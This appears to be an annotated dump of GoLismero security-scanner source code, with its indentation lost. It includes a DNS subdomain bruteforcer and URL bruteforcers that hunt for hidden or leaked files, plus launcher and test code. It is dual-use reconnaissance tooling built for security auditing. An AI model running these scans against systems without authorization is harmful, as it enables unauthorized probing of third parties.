# Note that after this point we need to explicitly import the classes we
# use, and make sure they're the newer versions of them. That means:
# ALWAYS USE FULLY QUALIFIED NAMES FROM HERE ON.
import golismero.api.logger
import golismero.main.testing
with golismero.main.testing.PluginTester(autoinit=False) as t:
t.orchestrator_config.ui_mode = "console"
t.orchestrator_config.verbose = cmdParams.verbose
t.orchestrator_config.color = cmdParams.color
t.init_environment(mock_audit=False)
# Call the plugin hooks.
all_plugins = sorted(
t.orchestrator.pluginManager.load_plugins().iteritems())
for plugin_id, plugin in all_plugins:
if hasattr(plugin, "update"):
if cmdParams.verbose:
golismero.api.logger.Logger.log(
"Updating plugin %r..." % plugin_id)
try:
t.run_plugin_method(plugin_id, "update")
except Exception:
golismero.api.logger.Logger.log_error(format_exc())
# Done!
if cmdParams.verbose:
golismero.api.logger.Logger.log("Update complete.")
exit(0)
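# Illustrative sketch (not part of GoLismero): the reload step above works by
# purging every module of the package from sys.modules, so that the next
# import statement loads the freshly pulled code. A minimal, generic version
# of that idea follows; the package name passed in is hypothetical.
def _purge_package_modules(package_name):
    import sys
    prefix = package_name + "."
    doomed = [n for n in list(sys.modules)
              if n == package_name or n.startswith(prefix)]
    for n in doomed:
        del sys.modules[n]
    return doomed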
# Crappy way of telling if we actually did fetch new code.
class _GitHelper(object):
def __init__(self, verbose):
self.log = []
self.verbose = verbose
def __call__(self, msg):
self.log.append(msg)
if self.verbose:
Logger.log(msg)
@property
def did_update(self):
##return True # for testing
return all("Already up-to-date." not in x for x in self.log)
#------------------------------------------------------------------------------
def command_run(parser, P, cmdParams, auditParams):
# For the SCAN command, assume targets are URLs whenever feasible.
if P.command == "SCAN":
guessed_urls = []
for target in auditParams.targets:
if not "://" in target:
guessed_urls.append("http://" + target)
auditParams.targets.extend(guessed_urls)
# For all other commands, disable the testing plugins.
else:
auditParams.plugin_load_overrides.append( (False, "testing") )
# For the IMPORT command, targets are import files.
if P.command == "IMPORT":
auditParams.imports = auditParams.targets # magic
del auditParams.targets # magic
# For the REPORT command, targets are report files.
elif P.command == "REPORT":
auditParams.reports = auditParams.targets # magic
del auditParams.targets # magic
# If we reached this point, we have an internal error!
else:
raise RuntimeError("Unsupported command: %s" % P.command)
# Expand wildcards for filenames on Windows.
# On other platforms this is not needed,
# as the shell already does it for us.
if os.path.sep == "\\":
auditParams._imports = expand_wildcards(auditParams._imports)
auditParams._reports = expand_wildcards(auditParams._reports)
try:
# Load the plugins.
manager = PluginManager()
manager.find_plugins(cmdParams)
# Sanitize the plugin arguments.
try:
if P.raw_plugin_args:
P.plugin_args = parse_plugin_args(manager, P.raw_plugin_args)
except KeyError, e:
##raise # XXX DEBUG
parser.error("error parsing plugin arguments: %s" % str(e))
# Prompt for passwords.
for plugin_id in P.plugin_args.keys():
plugin_info = manager.get_plugin_by_id(plugin_id)
target_args = P.plugin_args[plugin_id]
for key, value in target_args.items():
if not value and key in plugin_info.plugin_passwd_args:
if len(plugin_info.plugin_passwd_args) > 1:
msg = "Enter password for %s (%s): "
msg %= (plugin_info.display_name, key)
else:
msg = "Enter password for %s: "
msg %= plugin_info.display_name
target_args[key] = getpass(msg)
# Save the plugin arguments for the Orchestrator and the Audit.
cmdParams.plugin_args = P.plugin_args
auditParams.plugin_args = P.plugin_args
# Check the parameters.
cmdParams.check_params()
auditParams.check_params()
# Set the plugin arguments before loading the UI plugin.
for plugin_id, plugin_args in cmdParams.plugin_args.iteritems():
status = manager.set_plugin_args(plugin_id, plugin_args)
if status != 0: # should never happen, but just in case...
if status == 1:
msg = "Unknown plugin: %s"
elif status == 2:
msg = "Invalid arguments for plugin: %s"
else:
msg = "Error setting arguments for plugin: %s"
parser.error(msg % plugin_id)
# Load the UI plugin.
ui_plugin_id = "ui/" + cmdParams.ui_mode
ui_plugin = manager.load_plugin_by_id(ui_plugin_id)
# Show an error message if something goes wrong.
except Exception, e:
##raise # XXX DEBUG
parser.error("error loading plugins: %s" % str(e))
# Check the settings with the UI plugin.
try:
ui_plugin.check_params(cmdParams, auditParams)
except Exception, e:
##raise # XXX DEBUG
msg = str(e)
if not msg:
msg = "configuration error!"
elif msg == "No targets selected for audit.":
msg = "no targets selected for audit " \
"(did you misspell the database filename?)"
parser.error(msg)
# Launch GoLismero.
launcher.run(cmdParams, auditParams)
exit(0)
#------------------------------------------------------------------------------
def expand_wildcards(filenames):
expanded = []
for filename in filenames:
if "*" in filename or "?" in filename:
expanded.extend(glob(filename))
else:
expanded.append(filename)
return expanded
#------------------------------------------------------------------------------
if __name__ == '__main__':
main()
```
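A note on `build_config_from_cmdline()` above: it prepends any settings found in the
`GOLISMERO_SETTINGS` environment variable to the real command line, so options given on
the actual command line are parsed last and, for value options, override the environment
defaults. A minimal, self-contained sketch of that merge, using plain `argparse` and
`shlex.split()` as a stand-in for `convert_arg_line_to_args()` (the option names here are
illustrative, not GoLismero's):
```python
import argparse
import os
import shlex

parser = argparse.ArgumentParser()
parser.add_argument("command")
parser.add_argument("targets", nargs="*")
parser.add_argument("--verbose", action="store_true")

# Environment settings go first in the argument list, so anything typed
# explicitly on the command line is processed after them.
args = ["scan", "www.example.com"]
envcfg = os.getenv("GOLISMERO_SETTINGS")
if envcfg:
    args = shlex.split(envcfg) + args

print(parser.parse_args(args))
```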
#### File: misc/old_tests/test_data.py
```python
import sys
import os
from os import path
here = path.split(path.abspath(__file__))[0]
if not here: # if it fails use cwd instead
here = path.abspath(os.getcwd())
golismero = path.join(here, "..")
thirdparty_libs = path.join(golismero, "thirdparty_libs")
if path.exists(thirdparty_libs):
sys.path.insert(0, thirdparty_libs)
sys.path.insert(0, golismero)
# Import the base data types first.
from golismero.api.data import Data
from golismero.api.data.information import Information
from golismero.api.data.resource import Resource
from golismero.api.data.vulnerability import Vulnerability
# The local data cache.
from golismero.api.data import LocalDataCache
# The mock testing environment creator.
from golismero.main.testing import PluginTester
# Helper function to load all data types.
def helper_load_data_types():
data_types = []
# Look for Python files in golismero/api/data.
api_data = path.join(golismero, "golismero", "api", "data")
api_data = path.abspath(api_data)
print "Looking for modules in: %s" % api_data
assert path.isdir(api_data)
for root, folders, files in os.walk(api_data):
for name in files:
if name.startswith("_") or not name.endswith(".py"):
continue
# Get the module name from its file path.
name = name[:-3]
name = path.join(root, name)
name = path.abspath(name)
name = name[len(api_data):]
if name.startswith(path.sep):
name = name[1:]
name = name.replace(path.sep, ".")
name = "golismero.api.data." + name
print "--> Loading %s" % name
# Load the module and extract all its data types.
module = __import__(name, globals(), locals(), ['*'])
for name in dir(module):
if name.startswith("_") or name in (
"Data",
"Information",
"Resource",
"Vulnerability",
):
continue
clazz = getattr(module, name)
if isinstance(clazz, type) and issubclass(clazz, Data) and clazz not in data_types:
print "------> Found %s" % name
data_types.append(clazz)
return data_types
# This test will make sure all data types have a correct, unique type ID.
def test_data_types_have_id():
seen_types = set()
print
print "Testing correctness of data type IDs..."
data_types = helper_load_data_types()
assert len(data_types) > 0
for clazz in data_types:
print "--> Checking %s (%s)" % (clazz.__name__, clazz.data_subtype)
assert type(clazz.data_type) == int
if issubclass(clazz, Information):
assert clazz.data_type == Data.TYPE_INFORMATION
assert clazz.data_subtype == clazz.information_type
assert type(clazz.data_subtype) == str
assert clazz.data_subtype.startswith("information/")
elif issubclass(clazz, Resource):
assert clazz.data_type == Data.TYPE_RESOURCE
assert clazz.data_subtype == clazz.resource_type
assert type(clazz.data_subtype) == str
assert clazz.data_subtype.startswith("resource/")
elif issubclass(clazz, Vulnerability):
assert clazz.data_type == Data.TYPE_VULNERABILITY
assert clazz.data_subtype == clazz.vulnerability_type
assert type(clazz.data_subtype) == str
assert clazz.data_subtype.startswith("vulnerability/")
else:
assert False, clazz # A new base data class?
assert clazz.data_subtype.endswith("/abstract") or \
clazz.data_subtype not in seen_types, clazz.data_subtype
seen_types.add(clazz.data_subtype)
print
# This test makes sure the links work properly.
def test_data_links():
with PluginTester(autoinit=False) as t:
t.audit_config.targets = ["http://www.example.com/"]
t.orchestrator_config.ui_mode = "disabled"
t.init_environment()
helper_data_links()
# The actual test, without the boilerplate.
def helper_data_links():
# Create some dummy data.
from golismero.api.data.resource.url import URL
from golismero.api.data.information.text import Text
from golismero.api.data.vulnerability.information_disclosure.url_disclosure import UrlDisclosure
d1 = URL("http://www.example.com/")
d2 = Text("some text")
d3 = UrlDisclosure(d1)
d1.add_information(d2)
# Test data_type, data_subtype, etc.
print "Testing Data type checks..."
assert d1.data_type == Data.TYPE_RESOURCE
assert d1.data_subtype == URL.data_subtype
assert d1.resource_type == d1.data_subtype
assert d2.data_type == Data.TYPE_INFORMATION
assert d2.data_subtype == Text.data_subtype
assert d2.information_type == d2.data_subtype
assert d3.data_type == Data.TYPE_VULNERABILITY
assert d3.data_subtype == UrlDisclosure.data_subtype
assert d3.vulnerability_type == d3.data_subtype
# Test validate_link_minimums().
print "Testing Data.validate_link_minimums()..."
d1.validate_link_minimums()
d2.validate_link_minimums()
d3.validate_link_minimums()
# Test the links property.
print "Testing Data.links..."
assert d1.links == {d2.identity, d3.identity}
assert d2.links == {d1.identity}
assert d3.links == {d1.identity}
# Test the get_links method.
print "Testing Data.get_links()..."
assert d1.get_links(d1.data_type) == set()
assert d1.get_links(d1.data_type, d1.resource_type) == set()
assert d1.get_links(d2.data_type) == {d2.identity}
assert d1.get_links(d2.data_type, d2.information_type) == {d2.identity}
assert d1.get_links(d3.data_type) == {d3.identity}
assert d1.get_links(d3.data_type, d3.vulnerability_type) == {d3.identity}
assert d2.get_links(d2.data_type) == set()
assert d2.get_links(d2.data_type, d2.information_type) == set()
assert d2.get_links(d1.data_type) == {d1.identity}
assert d2.get_links(d1.data_type, d1.resource_type) == {d1.identity}
assert d2.get_links(d3.data_type) == set()
assert d2.get_links(d3.data_type, d3.vulnerability_type) == set()
assert d3.get_links(d3.data_type) == set()
assert d3.get_links(d3.data_type, d3.vulnerability_type) == set()
assert d3.get_links(d1.data_type) == {d1.identity}
assert d3.get_links(d1.data_type, d1.resource_type) == {d1.identity}
assert d3.get_links(d2.data_type) == set()
assert d3.get_links(d2.data_type, d2.information_type) == set()
# Test the linked_data property.
# There should be no accesses to the database since all data is local.
print "Testing Data.linked_data..."
assert {x.identity for x in d1.linked_data} == {d2.identity, d3.identity}
assert {x.identity for x in d2.linked_data} == {d1.identity}
assert {x.identity for x in d3.linked_data} == {d1.identity}
# Test the find_linked_data() method.
# There should be no accesses to the database since all data is local.
print "Testing Data.find_linked_data()..."
assert {x.identity for x in d1.find_linked_data(d1.data_type)} == set()
assert {x.identity for x in d1.find_linked_data(d1.data_type, d1.resource_type)} == set()
assert {x.identity for x in d1.find_linked_data(d2.data_type)} == {d2.identity}
assert {x.identity for x in d1.find_linked_data(d2.data_type, d2.information_type)} == {d2.identity}
assert {x.identity for x in d1.find_linked_data(d3.data_type)} == {d3.identity}
assert {x.identity for x in d1.find_linked_data(d3.data_type, d3.vulnerability_type)} == {d3.identity}
assert {x.identity for x in d2.find_linked_data(d2.data_type)} == set()
assert {x.identity for x in d2.find_linked_data(d2.data_type, d2.information_type)} == set()
assert {x.identity for x in d2.find_linked_data(d1.data_type)} == {d1.identity}
assert {x.identity for x in d2.find_linked_data(d1.data_type, d1.resource_type)} == {d1.identity}
assert {x.identity for x in d2.find_linked_data(d3.data_type)} == set()
assert {x.identity for x in d2.find_linked_data(d3.data_type, d3.vulnerability_type)} == set()
assert {x.identity for x in d3.find_linked_data(d3.data_type)} == set()
assert {x.identity for x in d3.find_linked_data(d3.data_type, d3.vulnerability_type)} == set()
assert {x.identity for x in d3.find_linked_data(d1.data_type)} == {d1.identity}
assert {x.identity for x in d3.find_linked_data(d1.data_type, d1.resource_type)} == {d1.identity}
assert {x.identity for x in d3.find_linked_data(d2.data_type)} == set()
assert {x.identity for x in d3.find_linked_data(d2.data_type, d2.information_type)} == set()
# Test the associated_* properties.
# There should be no accesses to the database since all data is local.
print "Testing Data.associated_*..."
assert {x.identity for x in d1.associated_resources} == set()
assert {x.identity for x in d1.associated_informations} == {d2.identity}
assert {x.identity for x in d1.associated_vulnerabilities} == {d3.identity}
assert {x.identity for x in d2.associated_informations} == set()
assert {x.identity for x in d2.associated_resources} == {d1.identity}
assert {x.identity for x in d2.associated_vulnerabilities} == set()
assert {x.identity for x in d3.associated_vulnerabilities} == set()
assert {x.identity for x in d3.associated_resources} == {d1.identity}
assert {x.identity for x in d3.associated_informations} == set()
# Test the get_associated_*_by_category() methods.
# There should be no accesses to the database since all data is local.
print "Testing Data.get_associated_*_by_category()..."
assert {x.identity for x in d1.get_associated_resources_by_category(d1.resource_type)} == set()
assert {x.identity for x in d1.get_associated_informations_by_category(d2.information_type)} == {d2.identity}
assert {x.identity for x in d1.get_associated_vulnerabilities_by_category(d3.vulnerability_type)} == {d3.identity}
assert {x.identity for x in d2.get_associated_informations_by_category(d2.information_type)} == set()
assert {x.identity for x in d2.get_associated_resources_by_category(d1.resource_type)} == {d1.identity}
assert {x.identity for x in d2.get_associated_vulnerabilities_by_category(d3.vulnerability_type)} == set()
assert {x.identity for x in d3.get_associated_vulnerabilities_by_category(d3.vulnerability_type)} == set()
assert {x.identity for x in d3.get_associated_resources_by_category(d1.resource_type)} == {d1.identity}
assert {x.identity for x in d3.get_associated_informations_by_category(d2.information_type)} == set()
# Test LocalDataCache.on_finish().
print "Testing LocalDataCache.on_finish() on ideal conditions..."
result = LocalDataCache.on_finish([d2, d3], d1)
assert set(result) == set([d1, d2, d3])
d1.validate_link_minimums()
d2.validate_link_minimums()
d3.validate_link_minimums()
assert d1.links == {d2.identity, d3.identity}
assert d2.links == {d1.identity}
assert d3.links == {d1.identity}
assert d1.get_links(d1.data_type) == set()
assert d1.get_links(d1.data_type, d1.resource_type) == set()
assert d1.get_links(d2.data_type) == {d2.identity}
assert d1.get_links(d2.data_type, d2.information_type) == {d2.identity}
assert d1.get_links(d3.data_type) == {d3.identity}
assert d1.get_links(d3.data_type, d3.vulnerability_type) == {d3.identity}
assert d2.get_links(d2.data_type) == set()
assert d2.get_links(d2.data_type, d2.information_type) == set()
assert d2.get_links(d1.data_type) == {d1.identity}
assert d2.get_links(d1.data_type, d1.resource_type) == {d1.identity}
assert d2.get_links(d3.data_type) == set()
assert d2.get_links(d3.data_type, d3.vulnerability_type) == set()
assert d3.get_links(d3.data_type) == set()
assert d3.get_links(d3.data_type, d3.vulnerability_type) == set()
assert d3.get_links(d1.data_type) == {d1.identity}
assert d3.get_links(d1.data_type, d1.resource_type) == {d1.identity}
assert d3.get_links(d2.data_type) == set()
assert d3.get_links(d2.data_type, d2.information_type) == set()
# XXX TODO: more tests!!!
# Run all tests from the command line.
if __name__ == "__main__":
test_data_types_have_id()
test_data_links()
```
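The `test_data_types_have_id()` test above verifies a naming convention rather than any
runtime behaviour: every concrete data class must expose the numeric `data_type` of its
base class plus a unique string `data_subtype` that starts with the matching prefix
("information/", "resource/" or "vulnerability/"), with "/abstract" subtypes allowed to
repeat. A stripped-down sketch of that invariant, independent of the real GoLismero
classes (the constants and names here are hypothetical stand-ins):
```python
TYPE_INFORMATION, TYPE_RESOURCE, TYPE_VULNERABILITY = 0, 1, 2

PREFIX_BY_TYPE = {
    TYPE_INFORMATION:   "information/",
    TYPE_RESOURCE:      "resource/",
    TYPE_VULNERABILITY: "vulnerability/",
}

def check_subtype(data_type, data_subtype, seen):
    """Raise AssertionError if the (type, subtype) pair breaks the convention."""
    prefix = PREFIX_BY_TYPE[data_type]
    assert isinstance(data_subtype, str) and data_subtype.startswith(prefix)
    # Abstract subtypes may repeat; concrete ones must be unique.
    assert data_subtype.endswith("/abstract") or data_subtype not in seen
    seen.add(data_subtype)

seen = set()
check_subtype(TYPE_RESOURCE, "resource/url", seen)
check_subtype(TYPE_VULNERABILITY,
              "vulnerability/information_disclosure/url_disclosure", seen)
```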
#### File: testing/scan/brute_dns.py
```python
"""
Golismero project site: http://golismero-project.com
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
from golismero.api.config import Config
from golismero.api.data.resource.domain import Domain
from golismero.api.text.text_utils import generate_random_string
from golismero.api.logger import Logger
from golismero.api.net.dns import DNS
from golismero.api.plugin import TestingPlugin
from golismero.api.text.wordlist import WordListLoader, WordlistNotFound
from golismero.api.data.vulnerability.information_disclosure.domain_disclosure import DomainDisclosure
#------------------------------------------------------------------------------
class DNSBruteforcer(TestingPlugin):
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [Domain]
#--------------------------------------------------------------------------
def run(self, info):
# Get the root domain only.
root = info.root
# Skip localhost.
if root == "localhost":
return
# Skip root domains we've already processed.
if self.state.put(root, True):
return
# Load the subdomains wordlist.
try:
wordlist = WordListLoader.get_wordlist_as_list(Config.plugin_args["wordlist"])
except WordlistNotFound:
Logger.log_error_verbose("Wordlist '%s' not found.." % Config.plugin_args["wordlist"])
return
except TypeError:
Logger.log_error_verbose("Wordlist '%s' is not a file." % Config.plugin_args["wordlist"])
return
# Load the subdomains whitelist.
try:
whitelist = WordListLoader.get_wordlist_as_list(Config.plugin_config["wordlist"])
except WordlistNotFound:
Logger.log_error_verbose("Wordlist '%s' not found.." % Config.plugin_config["wordlist"])
return
except TypeError:
Logger.log_error_verbose("Wordlist '%s' is not a file." % Config.plugin_config["wordlist"])
return
#
# Set a baseline for dynamic (wildcard) sub-domains
#
m_virtual_domains = []
for v in (generate_random_string(40) for x in xrange(3)):
l_subdomain = ".".join((v, root))
records = DNS.get_a(l_subdomain, also_CNAME=True)
for rec in records:
if rec.type == "CNAME":
m_virtual_domains.append(rec.target)
# If all 3 random subdomains resolve to the same target, record it as the wildcard base domain
m_base_domain = None
if len(set(m_virtual_domains)) == 1:
m_base_domain = m_virtual_domains[0]
# Configure the progress notifier.
self.progress.set_total(len(wordlist))
self.progress.min_delta = 1 # notify every 1%
# For each subdomain in the wordlist...
found = 0
results = []
visited = set()
for prefix in wordlist:
# Mark as completed before actually trying.
# We can't put this at the end of the loop where it belongs,
# because the "continue" statements would skip over this too.
self.progress.add_completed()
# Build the domain name.
name = ".".join((prefix, root))
# Skip if out of scope.
if name not in Config.audit_scope:
continue
# Resolve the subdomain.
records = DNS.get_a(name, also_CNAME=True)
records.extend( DNS.get_aaaa(name, also_CNAME=True) )
# If no DNS records were found, skip.
if not records:
continue
# If the CNAME points to the wildcard base domain, skip
chk = [True for x in records if x.type == "CNAME" and x.target == m_base_domain]
if len(chk) > 0 and all(chk):
continue
# We found a subdomain!
found += 1
Logger.log_more_verbose(
"Subdomain found: %s" % name)
# Create the Domain object for the subdomain.
domain = Domain(name)
results.append(domain)
#
# Check for Domain disclosure
#
if prefix not in whitelist:
d = DomainDisclosure(domain,
risk = 0,
level = "low",
title = "Possible subdomain leak",
description = "A subdomain was discovered which may be an unwanted information disclosure."
)
results.append(d)
# For each DNS record, grab the address or name.
# Skip duplicated records.
for rec in records:
if rec.type == "CNAME":
location = rec.target
elif rec.type in ("A", "AAAA"):
location = rec.address
else: # should not happen...
results.append(rec)
domain.add_information(rec)
continue
if location not in visited:
visited.add(location)
results.append(rec)
domain.add_information(rec)
# Log the results.
if found:
Logger.log(
"Found %d subdomains for root domain: %s"
% (found, root))
else:
Logger.log_verbose(
"No subdomains found for root domain: %s" % root)
# Return the results.
return results
```
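The key trick in `DNSBruteforcer.run()` above is the wildcard baseline: before
bruteforcing, it resolves a few long random labels under the target domain and, if they
all CNAME to the same place, remembers that target so any candidate subdomain that merely
resolves to it can be discarded. A compact sketch of just that idea, with a resolver
callable standing in for the GoLismero `DNS` API (the helper names and resolver signature
are hypothetical):
```python
import random
import string

def random_label(length=40):
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))

def wildcard_baseline(root, resolve_cname, samples=3):
    """Return the CNAME target shared by random subdomains, or None.

    resolve_cname(name) -> CNAME target string, or None if it does not resolve.
    """
    targets = set()
    for _ in range(samples):
        target = resolve_cname("%s.%s" % (random_label(), root))
        if target is None:
            return None          # at least one random name did not resolve
        targets.add(target)
    return targets.pop() if len(targets) == 1 else None

def is_wildcard_hit(name, baseline, resolve_cname):
    """True if `name` only resolves to the wildcard baseline and should be skipped."""
    return baseline is not None and resolve_cname(name) == baseline
```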
#### File: testing/scan/brute_url.py
```python
"""
Golismero project site: http://golismero-project.com
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
from golismero.api.config import Config
from golismero.api.data import discard_data
from golismero.api.data.information.fingerprint import WebServerFingerprint
from golismero.api.data.resource.url import FolderURL, URL
from golismero.api.data.vulnerability.information_disclosure.url_disclosure import UrlDisclosure
from golismero.api.logger import Logger
from golismero.api.net.http import HTTP
from golismero.api.net.web_utils import ParsedURL, urljoin, get_error_page
from golismero.api.text.matching_analyzer import MatchingAnalyzer, get_diff_ratio
from golismero.api.text.wordlist import WordListLoader
from golismero.api.plugin import TestingPlugin
from functools import partial
__doc__ = """
.. note:
Acknowledgments:
We'd like to thank @capi_x for his idea on how
to detect fake 200 responses from servers by
issuing known good and bad queries and diffing
them to calculate the deviation.
https://twitter.com/capi_x
"""
#------------------------------------------------------------------------------
# Impact vectors. Available values: 0 - 4.
severity_vectors = {
"suffixes" : 4,
"prefixes" : 3,
"file_extensions": 3,
"permutations" : 3,
"predictables": 4,
"directories": 2
}
#------------------------------------------------------------------------------
class PredictablesDisclosureBruteforcer(TestingPlugin):
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [FolderURL]
#--------------------------------------------------------------------------
def run(self, info):
m_url = info.url
Logger.log_more_verbose("Start to process URL: %r" % m_url)
# Server specified by param?
webserver_finger = Config.plugin_args.get("server_banner", None)
if webserver_finger:
server_canonical_name = webserver_finger
servers_related = [] # Set with related web servers
else:
# Use the fingerprint info gathered for the target
webserver_finger = info.get_associated_informations_by_category(WebServerFingerprint.information_type)
if webserver_finger:
webserver_finger = webserver_finger.pop()
server_canonical_name = webserver_finger.canonical_name
servers_related = webserver_finger.related # Set with related web servers
wordlist = set()
# Common wordlists
try:
w = Config.plugin_extra_config["common"]
wordlist.update([l_w for l_w in w.itervalues()])
except KeyError:
Logger.log_error("Can't load common wordlists")
# Is there fingerprinting information?
if webserver_finger:
#
# Load wordlists
#
wordlist_update = wordlist.update
# Wordlist of server name
try:
w = Config.plugin_extra_config["%s_predictables" % server_canonical_name]
wordlist_update([l_w for l_w in w.itervalues()])
except KeyError:
Logger.log_error("Can't load predictables wordlists for server: '%s'." % server_canonical_name)
# Wordlist of related with the server found
try:
for l_servers_related in servers_related:
w = Config.plugin_extra_config["%s_predictables" % l_servers_related]
wordlist_update([l_w for l_w in w.itervalues()])
except KeyError, e:
Logger.log_error("Can't load wordlists predictables wordlists for related webserver: '%s'" % e)
# Load content of wordlists
urls = set()
m_urls_update = urls.add
for l_w in wordlist:
# Use a copy of the wordlist to avoid modifying the original source
l_loaded_wordlist = WordListLoader.get_wordlist_as_list(l_w)
for l_wo in l_loaded_wordlist:
try:
l_wo = l_wo[1:] if l_wo.startswith("/") else l_wo
tmp_u = urljoin(m_url, l_wo)
except ValueError, e:
Logger.log_error("Failed to parse key, from wordlist, '%s'" % tmp_u)
continue
m_urls_update(tmp_u)
Logger.log_verbose("Loaded %s URLs to test." % len(urls))
# Generates the error page
error_response = get_error_page(m_url)
# Create the matching analyzer
try:
store_info = MatchingAnalyzer(error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['predictables'],
get_http_method(m_url),
store_info,
self.update_status,
len(urls))
# Process the URLs
for i, l_url in enumerate(urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(store_info.unique_texts)
#------------------------------------------------------------------------------
class SuffixesDisclosureBruteforcer(TestingPlugin):
"""
Testing suffixes: index.php -> index_0.php
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Bruteforcing URL: %s" % m_url)
#
# Load wordlist for suffixes: index.php -> index_0.php
#
# COMMON
m_urls = make_url_with_suffixes(get_list_from_wordlist("common_suffixes"), m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['suffixes'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
class PrefixesDisclosureBruteforcer(TestingPlugin):
"""
Testing filename prefixes: index.php -> xyz_index.php
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Bruteforcing URL: %s" % m_url)
#
# Load wordlist for prefixes
#
# COMMON
m_urls = make_url_with_prefixes(get_list_from_wordlist("common_prefixes"), m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['prefixes'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
class FileExtensionsDisclosureBruteforcer(TestingPlugin):
"""
Testing changing extension of files
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Start to process URL: %s" % m_url)
#
# Load wordlist for changing extension of files
#
# COMMON
m_urls = make_url_changing_extensions(get_list_from_wordlist("common_extensions"), m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not enough information to analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['file_extensions'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
class PermutationsDisclosureBruteforcer(TestingPlugin):
"""
Testing filename permutations
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Bruteforcing URL: '%s'" % m_url)
#
# Load wordlist for permutations
#
# COMMON
m_urls = make_url_mutate_filename(m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['permutations'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
class DirectoriesDisclosureBruteforcer(TestingPlugin):
"""
Testing changing directories of files
"""
#--------------------------------------------------------------------------
def get_accepted_types(self):
return [URL]
#--------------------------------------------------------------------------
def run(self, info):
# Parse original URL
m_url = info.url
m_url_parts = info.parsed_url
# If file is a javascript, css or image, do not run
